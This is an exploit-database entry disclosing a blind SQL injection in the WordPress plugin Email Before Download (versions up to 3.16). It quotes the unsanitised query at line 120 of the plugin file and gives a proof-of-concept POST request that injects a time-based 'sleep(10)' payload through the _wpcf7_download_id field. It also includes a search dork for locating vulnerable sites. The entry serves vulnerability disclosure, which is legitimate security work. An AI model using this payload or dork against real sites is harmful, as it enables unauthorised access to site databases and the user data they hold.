Wordpress Plugin Email Before Download <=3.16 Blind SQL Inyection

2012-04-13T00:00:00
ID 1337DAY-ID-18049
Type zdt
Reporter localh0t
Modified 2012-04-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Wordpress Plugin: Email Before Download <=3.16 Remote Blind SQL Inyection
# Dork: allinurl: plugins/email-before-download
# Download: https://wordpress.org/extend/plugins/email-before-download/
# Date: 13/04/12
# Contact: [email protected]
# Follow: @mattdch
# www.localh0t.com.ar
 

The variable $download_id is not properly sanitized with $wpdb->escape() before using it.

On line 120 (File: /email-before-download/email-before-download.php) we can see that:
=====================================================================================

	120: $ebd_item = $wpdb->get_row( "SELECT * FROM $table_item  WHERE download_id = '$download_id' " );

In the HTML generated, we can see that $download_id takes the $_POST value variable "_wpcf7_download_id" :

 	201: $hf .= '<input type="hidden" name="_wpcf7_download_id" value="' . $download_id. '" /></form>';

PoC:
====

	POST http://website.com/?tag=some-post-with-contact-form

	Data:
	=====
	_wpcf7=135&_wpcf7_download_id=6 [SQL HERE]&_wpcf7_unit_tag=wpcf7-f105-p1635-o1&_wpcf7_version=3.0.1&[email protected]&your-enterprise=1&your-name=test
	
		Example:
		========
		_wpcf7=135&_wpcf7_download_id=6 and sleep(10)&_wpcf7_unit_tag=wpcf7-f105-p1635-o1&_wpcf7_version=3.0.1&[email protected]&your-enterprise=1&your-name=test

(POST variables names may vary)



#  0day.today [2018-03-28]  #